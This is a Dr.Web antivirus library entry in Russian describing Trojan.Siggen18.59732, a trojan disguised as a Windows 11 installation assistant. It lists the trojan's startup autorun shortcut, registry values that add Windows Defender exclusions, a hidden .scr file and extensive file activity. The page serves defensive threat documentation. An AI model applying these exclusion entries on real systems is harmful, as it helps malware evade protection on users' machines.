Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen18.59732

Добавлен в вирусную базу Dr.Web: 2022-10-16

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
  • %APPDATA%\microsoft\windows\start menu\programs\startup\windows11installationassistant.lnk
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
  • [<HKLM>\soFtwAre\MICrosOFt\wiNdoWS defender\eXcLuSIons\eXtensIOnS] 'dLl' = '00000000'
  • [<HKLM>\SoftwAre\mIcroSofT\wINdowS deFeNder\exclusioNS\extenSIoNS] 'sCr' = '00000000'
  • [<HKLM>\SOfTware\MiCrosofT\wIndOws defender\eXclusiONS\eXTeNsionS] 'CMd' = '00000000'
  • [<HKLM>\SoFtwAre\MIcrosoft\WindoWs deFeNder\eXclUsiONS\eXteNSIOnS] 'exe' = '00000000'
  • [<HKLM>\sOFTWare\micrOsoFt\wINdoWS deFender\exCLusIONs\pAthS] '<DRIVERS>\etc\hOSTS' = '00000000'
Запускает на исполнение
  • '%WINDIR%\syswow64\taskkill.exe' /f /im "Windows11InstaIIation.scr"
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\is-d4hvt.tmp\<Имя файла>.tmp
  • %APPDATA%\windows11installationassistant\images\is-4qvjk.tmp
  • %APPDATA%\windows11installationassistant\images\is-kvl60.tmp
  • %APPDATA%\windows11installationassistant\images\is-ku1q7.tmp
  • %APPDATA%\windows11installationassistant\images\is-tpcof.tmp
  • %APPDATA%\windows11installationassistant\images\is-gk6e3.tmp
  • C:\tmp\.cmd
  • C:\tmp\.vbs
  • %TEMP%\is-is2pc.tmp\temp\.cmd
  • %TEMP%\autfc19.tmp
  • %APPDATA%\windows11installationassistant\images\is-16j1n.tmp
  • %APPDATA%\windows11installationassistant\images\is-fs3v0.tmp
  • %TEMP%\2w6q7b2q.tmp
  • %TEMP%\aut656.tmp
  • %TEMP%\2w0t1i6p.tmp
  • %TEMP%\aut676.tmp
  • %WINDIR%\temp\aut685.tmp
  • %TEMP%\aut697.tmp
  • %WINDIR%\temp\2w6t0i0p.tmp
  • %WINDIR%\temp\aut6b5.tmp
  • %WINDIR%\temp\aut6e5.tmp
  • %WINDIR%\temp\aut1045.tmp
  • %TEMP%\autfc3a.tmp
  • %TEMP%\autfc4a.tmp
  • %APPDATA%\windows11installationassistant\images\is-961hn.tmp
  • %APPDATA%\windows11installationassistant\images\is-k7pk5.tmp
  • %APPDATA%\windows11installationassistant\images\is-vft7m.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-sa8ah.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-5udrt.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-nv6o1.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-hrsur.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-a9l44.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-nh3eq.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-2ruli.tmp
  • %APPDATA%\windows11installationassistant\images\is-27gdf.tmp
  • %APPDATA%\windows11installationassistant\images\is-4a1k9.tmp
  • %APPDATA%\windows11installationassistant\images\is-4pq2k.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-eqm4n.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-8c87h.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-bgo3p.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-ijt32.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-jsk8n.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-am7j9.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-0idfb.tmp
  • %APPDATA%\windows11installationassistant\images\is-1rcvs.tmp
  • %APPDATA%\windows11installationassistant\is-m0t7r.tmp
  • %APPDATA%\windows11installationassistant\images\is-rkjpv.tmp
  • %APPDATA%\windows11installationassistant\images\is-f277n.tmp
  • %APPDATA%\windows11installationassistant\images\is-eotcr.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-4vqic.tmp
  • %WINDIR%\temp\4hbd2u8c.tmp
  • %WINDIR%\temp\aut1075.tmp
  • %WINDIR%\temp\aut10a5.tmp
  • %TEMP%\aut11fa.tmp
  • %WINDIR%\temp\aut3afd.tmp
  • %WINDIR%\temp\8izg7x6u.tmp
  • %WINDIR%\temp\aut3b3c.tmp
  • %WINDIR%\temp\aut3b5c.tmp
  • %WINDIR%\temp\aut41ff.tmp
  • %WINDIR%\temp\1x9o6w0k.tmp
  • %WINDIR%\temp\aut424e.tmp
  • %WINDIR%\temp\aut426e.tmp
  • %WINDIR%\temp\aut427c.tmp
  • %WINDIR%\temp\2t2l1m2t.tmp
  • %WINDIR%\temp\aut428c.tmp
  • %WINDIR%\temp\aut430a.tmp
  • %APPDATA%\windows11installationassistant\.cmd
  • %APPDATA%\windows11installationassistant\.vbs
  • %WINDIR%\temp\aut5254.tmp
  • %WINDIR%\temp\4fbo8g6u.tmp
  • %WINDIR%\temp\aut53db.tmp
  • %WINDIR%\temp\aut53eb.tmp
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\windowscritical.png
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\windowswarning.png
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\windowssuccess.png
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\windowshelp.png
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\pfp.png
  • %TEMP%\aut37b4.tmp
  • %TEMP%\2g8x4u8z.tmp
  • %TEMP%\aut3794.tmp
  • %TEMP%\aut3784.tmp
  • %TEMP%\1d1u0c4b.tmp
  • %TEMP%\aut121a.tmp
  • %TEMP%\aut123a.tmp
  • %WINDIR%\temp\aut1728.tmp
  • %WINDIR%\temp\1q2u0i4g.tmp
  • %WINDIR%\temp\aut1758.tmp
  • %WINDIR%\temp\aut1778.tmp
  • %WINDIR%\temp\aut258a.tmp
  • %WINDIR%\temp\1i0y4x4w.tmp
  • %WINDIR%\temp\aut25aa.tmp
  • %WINDIR%\temp\aut25ba.tmp
  • %TEMP%\aut2645.tmp
  • %TEMP%\1i4y7x6w.tmp
  • %TEMP%\aut26f1.tmp
  • %TEMP%\aut2712.tmp
  • %WINDIR%\temp\aut2a89.tmp
  • %WINDIR%\temp\1v8c7k6t.tmp
  • %WINDIR%\temp\aut2a99.tmp
  • %WINDIR%\temp\aut2ad9.tmp
  • %WINDIR%\temp\aut314c.tmp
  • %WINDIR%\temp\2p8j9w2t.tmp
  • %WINDIR%\temp\aut316d.tmp
  • %WINDIR%\temp\aut318d.tmp
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\windows 11.png
  • %APPDATA%\windows11installationassistant\images\is-t2387.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-p4525.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-3rlip.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-prhpb.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-eeq9r.tmp
  • %APPDATA%\windows11installationassistant\is-bmmhl.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-8142v.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-mmhcr.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-m3bue.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-tkgnk.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-d8grq.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-vi2fu.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-vb9qd.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-6313m.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-k4ngt.tmp
  • %APPDATA%\windows11installationassistant\images\is-ri6rc.tmp
  • %APPDATA%\windows11installationassistant\images\is-intt1.tmp
  • %APPDATA%\windows11installationassistant\images\is-v4bul.tmp
  • %APPDATA%\windows11installationassistant\images\is-vj050.tmp
  • %TEMP%\is-is2pc.tmp\temp\is-ukirs.tmp
  • %APPDATA%\windows11installationassistant\images\is-2lt2i.tmp
  • %APPDATA%\windows11installationassistant\images\is-7nn97.tmp
  • %APPDATA%\windows11installationassistant\images\is-lm64r.tmp
  • %APPDATA%\windows11installationassistant\images\is-crji7.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-lkp31.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ro2vs.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-e70rd.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-k0egl.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-bf8g5.tmp
  • %TEMP%\is-29vav.tmp\_isetup\_shfoldr.dll
  • %TEMP%\is-l0l3e.tmp\<Имя файла>.tmp
  • %TEMP%\is-is2pc.tmp\_isetup\_setup64.tmp
  • %TEMP%\is-is2pc.tmp\_isetup\_shfoldr.dll
  • %TEMP%\is-is2pc.tmp\is-l1e80.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-p1kud.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-pj1gl.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-c5vn5.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-n3rg0.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-kl65c.tmp
  • %TEMP%\is-29vav.tmp\_isetup\_setup64.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-np2ek.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-08h3c.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-tjtlb.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-n6h9c.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-c63go.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-5rn5t.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-6ms10.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-l38uk.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ump21.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-9quvb.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ehff3.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-tkqk1.tmp
  • %APPDATA%\windows11installationassistant\images\is-i3e57.tmp
  • %APPDATA%\windows11installationassistant\images\is-f2glg.tmp
  • %APPDATA%\windows11installationassistant\images\is-geot8.tmp
  • %APPDATA%\windows11installationassistant\images\is-vukj4.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-12aol.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-s68th.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-peo71.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-lq7cr.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-in8p6.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-7i336.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-8sfic.tmp
  • %APPDATA%\windows11installationassistant\images\is-7b2gk.tmp
  • %APPDATA%\windows11installationassistant\images\is-1jg32.tmp
  • %APPDATA%\windows11installationassistant\images\is-cu67g.tmp
  • %APPDATA%\windows11installationassistant\images\is-c6o6u.tmp
  • %APPDATA%\windows11installationassistant\images\is-a2aid.tmp
  • %APPDATA%\windows11installationassistant\images\is-hm8j0.tmp
  • %APPDATA%\windows11installationassistant\images\is-grhq7.tmp
  • %APPDATA%\windows11installationassistant\images\is-5a7jf.tmp
  • %APPDATA%\windows11installationassistant\images\is-nm2rv.tmp
  • %APPDATA%\windows11installationassistant\images\is-cfqpp.tmp
  • %APPDATA%\windows11installationassistant\images\is-848f1.tmp
  • %APPDATA%\windows11installationassistant\images\is-el2ql.tmp
  • %APPDATA%\windows11installationassistant\images\is-87sr1.tmp
  • %APPDATA%\windows11installationassistant\images\is-5dls4.tmp
  • %APPDATA%\windows11installationassistant\images\is-jodtp.tmp
  • %APPDATA%\windows11installationassistant\images\is-4nkjb.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-s2m1b.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-fetao.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-iuma4.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-dv8on.tmp
  • %APPDATA%\windows11installationassistant\images\is-e23co.tmp
  • %APPDATA%\windows11installationassistant\images\is-ccba8.tmp
  • %APPDATA%\windows11installationassistant\images\is-a1gfs.tmp
  • %APPDATA%\windows11installationassistant\images\is-gf67b.tmp
  • %APPDATA%\windows11installationassistant\images\is-ma64u.tmp
  • %APPDATA%\windows11installationassistant\images\is-fie25.tmp
  • %APPDATA%\windows11installationassistant\images\is-vj72h.tmp
  • C:\tmp\is-c33bl.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-itkth.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-b69c2.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-p26uv.tmp
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ajngq.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-341a8.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-spdal.tmp
  • C:\tmp\is-90oit.tmp
  • %APPDATA%\windows11installationassistant\images\is-r24rh.tmp
  • %APPDATA%\windows11installationassistant\images\is-4ve2r.tmp
  • %APPDATA%\windows11installationassistant\images\is-h5vkm.tmp
  • %APPDATA%\windows11installationassistant\images\is-o0gg4.tmp
  • %APPDATA%\windows11installationassistant\images\is-aga4j.tmp
  • %APPDATA%\windows11installationassistant\images\is-tad33.tmp
  • %APPDATA%\windows11installationassistant\images\is-a4hku.tmp
  • %APPDATA%\windows11installationassistant\icons\classic\is-mutcb.tmp
  • %APPDATA%\windows11installationassistant\images\is-no61c.tmp
  • %LOCALAPPDATA%\orange group\windows 11 compatibility checker\cpus.txt
Присваивает атрибут 'скрытый' для следующих файлов
  • %APPDATA%\windows11installationassistant\ar.xml
  • %TEMP%\is-is2pc.tmp\temp\r.exe
  • C:\tmp\ico1.ico
  • C:\tmp\pbd.dll
  • %APPDATA%\windows11installationassistant\windows11instaiiation.scr
  • %APPDATA%\windows11installationassistant\.cmd
  • %APPDATA%\windows11installationassistant\.vbs
Удаляет следующие файлы
  • %TEMP%\is-29vav.tmp\_isetup\_setup64.tmp
  • %WINDIR%\temp\aut41ff.tmp
  • %TEMP%\is-is2pc.tmp\temp\.cmd
  • %WINDIR%\temp\8izg7x6u.tmp
  • %WINDIR%\temp\aut3b5c.tmp
  • %WINDIR%\temp\aut3b3c.tmp
  • %WINDIR%\temp\aut3afd.tmp
  • %WINDIR%\temp\aut2ad9.tmp
  • %TEMP%\2g8x4u8z.tmp
  • %TEMP%\aut3794.tmp
  • %TEMP%\aut3784.tmp
  • %WINDIR%\temp\2p8j9w2t.tmp
  • %WINDIR%\temp\aut318d.tmp
  • %WINDIR%\temp\aut316d.tmp
  • %WINDIR%\temp\aut314c.tmp
  • %TEMP%\aut37b4.tmp
  • %WINDIR%\temp\1v8c7k6t.tmp
  • %WINDIR%\temp\aut424e.tmp
  • %WINDIR%\temp\aut53eb.tmp
  • %TEMP%\is-is2pc.tmp\_isetup\_setup64.tmp
  • %TEMP%\is-is2pc.tmp\temp\r.exe
  • C:\tmp\pbd.dll
  • C:\tmp\ico1.ico
  • %APPDATA%\windows11installationassistant\ar.xml
  • %TEMP%\is-is2pc.tmp\windows.11.compatibility.checker.exe
  • %WINDIR%\temp\aut427c.tmp
  • %WINDIR%\temp\aut426e.tmp
  • %WINDIR%\temp\aut53db.tmp
  • %WINDIR%\temp\aut5254.tmp
  • %WINDIR%\temp\2t2l1m2t.tmp
  • %WINDIR%\temp\aut430a.tmp
  • %WINDIR%\temp\aut428c.tmp
  • %WINDIR%\temp\1x9o6w0k.tmp
  • %WINDIR%\temp\4fbo8g6u.tmp
  • %WINDIR%\temp\aut2a99.tmp
  • %WINDIR%\temp\aut2a89.tmp
  • %TEMP%\1i4y7x6w.tmp
  • %WINDIR%\temp\aut6e5.tmp
  • %WINDIR%\temp\aut6b5.tmp
  • %TEMP%\2w0t1i6p.tmp
  • %TEMP%\aut697.tmp
  • %WINDIR%\temp\aut685.tmp
  • %WINDIR%\temp\aut1045.tmp
  • %TEMP%\aut676.tmp
  • %TEMP%\2w6q7b2q.tmp
  • %TEMP%\autfc4a.tmp
  • %TEMP%\autfc3a.tmp
  • %TEMP%\autfc19.tmp
  • %TEMP%\is-d4hvt.tmp\<Имя файла>.tmp
  • %TEMP%\is-29vav.tmp\_isetup\_shfoldr.dll
  • %TEMP%\aut656.tmp
  • %WINDIR%\temp\aut1075.tmp
  • %WINDIR%\temp\2w6t0i0p.tmp
  • %WINDIR%\temp\aut10a5.tmp
  • %TEMP%\aut2712.tmp
  • %WINDIR%\temp\1q2u0i4g.tmp
  • %TEMP%\aut26f1.tmp
  • %TEMP%\aut2645.tmp
  • %WINDIR%\temp\1i0y4x4w.tmp
  • %WINDIR%\temp\aut25ba.tmp
  • %WINDIR%\temp\aut25aa.tmp
  • %WINDIR%\temp\aut258a.tmp
  • %WINDIR%\temp\aut1778.tmp
  • %WINDIR%\temp\4hbd2u8c.tmp
  • %WINDIR%\temp\aut1758.tmp
  • %WINDIR%\temp\aut1728.tmp
  • %TEMP%\1d1u0c4b.tmp
  • %TEMP%\aut123a.tmp
  • %TEMP%\aut121a.tmp
  • %TEMP%\aut11fa.tmp
  • %TEMP%\is-is2pc.tmp\_isetup\_shfoldr.dll
  • %TEMP%\is-l0l3e.tmp\<Имя файла>.tmp
Перемещает следующие файлы
  • %TEMP%\is-is2pc.tmp\is-l1e80.tmp в %TEMP%\is-is2pc.tmp\windows.11.compatibility.checker.exe
  • %APPDATA%\windows11installationassistant\images\is-no61c.tmp в %APPDATA%\windows11installationassistant\images\menuicon@350.png
  • %APPDATA%\windows11installationassistant\images\is-4nkjb.tmp в %APPDATA%\windows11installationassistant\images\menuicon@325.png
  • %APPDATA%\windows11installationassistant\images\is-jodtp.tmp в %APPDATA%\windows11installationassistant\images\menuicon@300.png
  • %APPDATA%\windows11installationassistant\images\is-5dls4.tmp в %APPDATA%\windows11installationassistant\images\menuicon@275.png
  • %APPDATA%\windows11installationassistant\images\is-87sr1.tmp в %APPDATA%\windows11installationassistant\images\menuicon@250.png
  • %APPDATA%\windows11installationassistant\images\is-el2ql.tmp в %APPDATA%\windows11installationassistant\images\menuicon@225.png
  • %APPDATA%\windows11installationassistant\images\is-848f1.tmp в %APPDATA%\windows11installationassistant\images\menuicon@200.png
  • %APPDATA%\windows11installationassistant\images\is-cfqpp.tmp в %APPDATA%\windows11installationassistant\images\menuicon@175.png
  • %APPDATA%\windows11installationassistant\images\is-nm2rv.tmp в %APPDATA%\windows11installationassistant\images\menuicon@150.png
  • %APPDATA%\windows11installationassistant\images\is-5a7jf.tmp в %APPDATA%\windows11installationassistant\images\menuicon@125.png
  • %APPDATA%\windows11installationassistant\images\is-grhq7.tmp в %APPDATA%\windows11installationassistant\images\menuicon@100.png
  • %APPDATA%\windows11installationassistant\images\is-hm8j0.tmp в %APPDATA%\windows11installationassistant\images\foldericon@75-.png
  • %APPDATA%\windows11installationassistant\images\is-a2aid.tmp в %APPDATA%\windows11installationassistant\images\foldericon@350.png
  • %APPDATA%\windows11installationassistant\images\is-c6o6u.tmp в %APPDATA%\windows11installationassistant\images\foldericon@325.png
  • %APPDATA%\windows11installationassistant\icons\classic\is-3rlip.tmp в %APPDATA%\windows11installationassistant\icons\classic\d16.ico
  • %APPDATA%\windows11installationassistant\images\is-cu67g.tmp в %APPDATA%\windows11installationassistant\images\foldericon@300.png
  • %APPDATA%\windows11installationassistant\images\is-7b2gk.tmp в %APPDATA%\windows11installationassistant\images\fencessmall@200.png
  • %APPDATA%\windows11installationassistant\icons\classic\is-8sfic.tmp в %APPDATA%\windows11installationassistant\icons\classic\d20.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-7i336.tmp в %APPDATA%\windows11installationassistant\icons\classic\d2.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-in8p6.tmp в %APPDATA%\windows11installationassistant\icons\classic\d1a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-lq7cr.tmp в %APPDATA%\windows11installationassistant\icons\classic\d19a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-peo71.tmp в %APPDATA%\windows11installationassistant\icons\classic\d5a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-s68th.tmp в %APPDATA%\windows11installationassistant\icons\classic\d5.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-12aol.tmp в %APPDATA%\windows11installationassistant\icons\classic\prev.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-s2m1b.tmp в %APPDATA%\windows11installationassistant\icons\classic\next.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-iuma4.tmp в %APPDATA%\windows11installationassistant\icons\classic\d9a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-fetao.tmp в %APPDATA%\windows11installationassistant\icons\classic\d9.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-dv8on.tmp в %APPDATA%\windows11installationassistant\icons\classic\d8a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-mutcb.tmp в %APPDATA%\windows11installationassistant\icons\classic\d8.ico
  • %APPDATA%\windows11installationassistant\images\is-a4hku.tmp в %APPDATA%\windows11installationassistant\images\fencessmall@150.png
  • %APPDATA%\windows11installationassistant\images\is-1jg32.tmp в %APPDATA%\windows11installationassistant\images\foldericon@100.png
  • %APPDATA%\windows11installationassistant\icons\classic\is-jsk8n.tmp в %APPDATA%\windows11installationassistant\icons\classic\d4.ico
  • %APPDATA%\windows11installationassistant\images\is-tpcof.tmp в %APPDATA%\windows11installationassistant\images\pagerbullets.png
  • %APPDATA%\windows11installationassistant\icons\classic\is-eqm4n.tmp в %APPDATA%\windows11installationassistant\icons\classic\d15.ico
  • %APPDATA%\windows11installationassistant\images\is-ku1q7.tmp в %APPDATA%\windows11installationassistant\images\pagerbullet@100.png
  • %APPDATA%\windows11installationassistant\images\is-kvl60.tmp в %APPDATA%\windows11installationassistant\images\pagerbullet.png
  • %APPDATA%\windows11installationassistant\images\is-4qvjk.tmp в %APPDATA%\windows11installationassistant\images\pagerbackr@100.png
  • %APPDATA%\windows11installationassistant\images\is-fs3v0.tmp в %APPDATA%\windows11installationassistant\images\pagerbackc.png
  • %APPDATA%\windows11installationassistant\images\is-16j1n.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@350.png
  • %APPDATA%\windows11installationassistant\images\is-961hn.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@325.png
  • %APPDATA%\windows11installationassistant\images\is-k7pk5.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@300.png
  • %APPDATA%\windows11installationassistant\images\is-vft7m.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@275.png
  • %APPDATA%\windows11installationassistant\images\is-eotcr.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@250.png
  • %APPDATA%\windows11installationassistant\images\is-f277n.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@225.png
  • %APPDATA%\windows11installationassistant\images\is-rkjpv.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@200.png
  • %APPDATA%\windows11installationassistant\is-m0t7r.tmp в %APPDATA%\windows11installationassistant\windows11instaiiation.scr
  • %APPDATA%\windows11installationassistant\images\is-1rcvs.tmp в %APPDATA%\windows11installationassistant\images\fencessmall@175.png
  • %APPDATA%\windows11installationassistant\icons\new blue\is-0idfb.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d13.ico
  • %APPDATA%\windows11installationassistant\images\is-tad33.tmp в %APPDATA%\windows11installationassistant\images\fencessmall@125.png
  • %APPDATA%\windows11installationassistant\icons\classic\is-am7j9.tmp в %APPDATA%\windows11installationassistant\icons\classic\d4a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-ijt32.tmp в %APPDATA%\windows11installationassistant\icons\classic\d3a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-bgo3p.tmp в %APPDATA%\windows11installationassistant\icons\classic\d3.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-4vqic.tmp в %APPDATA%\windows11installationassistant\icons\classic\d2a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-8c87h.tmp в %APPDATA%\windows11installationassistant\icons\classic\d20a.ico
  • %APPDATA%\windows11installationassistant\images\is-4pq2k.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@175.png
  • %APPDATA%\windows11installationassistant\images\is-4a1k9.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@150.png
  • %APPDATA%\windows11installationassistant\images\is-27gdf.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@125.png
  • %APPDATA%\windows11installationassistant\icons\new blue\is-2ruli.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d19a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-nh3eq.tmp в %APPDATA%\windows11installationassistant\icons\classic\d19.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-a9l44.tmp в %APPDATA%\windows11installationassistant\icons\classic\d18a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-hrsur.tmp в %APPDATA%\windows11installationassistant\icons\classic\d18.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-nv6o1.tmp в %APPDATA%\windows11installationassistant\icons\classic\d17a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-5udrt.tmp в %APPDATA%\windows11installationassistant\icons\classic\d17.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-sa8ah.tmp в %APPDATA%\windows11installationassistant\icons\classic\d15a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-p4525.tmp в %APPDATA%\windows11installationassistant\icons\classic\d16a.ico
  • %APPDATA%\windows11installationassistant\images\is-t2387.tmp в %APPDATA%\windows11installationassistant\images\navigateupicon@100.png
  • %APPDATA%\windows11installationassistant\images\is-aga4j.tmp в %APPDATA%\windows11installationassistant\images\fencessmall@100.png
  • %APPDATA%\windows11installationassistant\icons\new blue\is-lkp31.tmp в %APPDATA%\windows11installationassistant\icons\new blue\next.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-d8grq.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d8a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-tkgnk.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d8.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-m3bue.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d7a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-mmhcr.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d7.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-8142v.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d6a.ico
  • %APPDATA%\windows11installationassistant\is-bmmhl.tmp в %APPDATA%\windows11installationassistant\ar.xml
  • %APPDATA%\windows11installationassistant\icons\new blue\is-eeq9r.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d6.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-prhpb.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d18a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-6313m.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d18.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-vb9qd.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d17a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-e70rd.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d17.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-k0egl.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d16a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-bf8g5.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d16.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ehff3.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d19.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-vi2fu.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d9.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-9quvb.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d15a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-l38uk.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d14a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-6ms10.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d14.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-5rn5t.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d13a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-c63go.tmp в %APPDATA%\windows11installationassistant\icons\classic\d14a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-n6h9c.tmp в %APPDATA%\windows11installationassistant\icons\classic\d14.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-tjtlb.tmp в %APPDATA%\windows11installationassistant\icons\classic\d13a.ico
